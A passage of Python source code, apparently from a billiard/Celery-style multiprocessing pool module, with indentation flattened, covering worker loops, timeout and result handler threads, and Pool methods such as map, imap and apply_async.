self.max_memory_per_child = max_memory_per_child
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
max_memory_per_child = self.max_memory_per_child or 0
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
if max_memory_per_child > 0:
used_kb = mem_rss()
if used_kb <= 0:
error('worker unable to determine memory usage')
if used_kb > 0 and used_kb > max_memory_per_child:
error(MAXMEM_USED_FMT.format(
used_kb, max_memory_per_child))
return EX_RECYCLE
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), TERM_SIGNAL)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool, cache):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
self.cache = cache
super(TaskHandler, self).__init__()
def body(self):
cache = self.cache
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
task = None
i = -1
try:
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
except Exception:
job, ind = task[:2]
try:
cache[job]._set(ind, (False, ExceptionInfo()))
except KeyError:
pass
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception:
job, ind = task[:2] if task else (0, 0)
if job in cache:
cache[job]._set(ind + 1, (False, ExceptionInfo()))
if set_length:
util.debug('doing set_length()')
set_length(i + 1)
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGTERM) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGTERM)
else:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
if os.getpgid(worker.pid) == worker.pid:
debug("worker %s is a group leader. It is safe to kill (SIGKILL) the whole group", worker.pid)
os.killpg(os.getpgid(worker.pid), signal.SIGKILL)
else:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
class Process(self._ctx.Process):
_controlled_termination = False
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
self._Process = Process
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
debug('Supervisor: worked %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
Callback is called when the functions return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
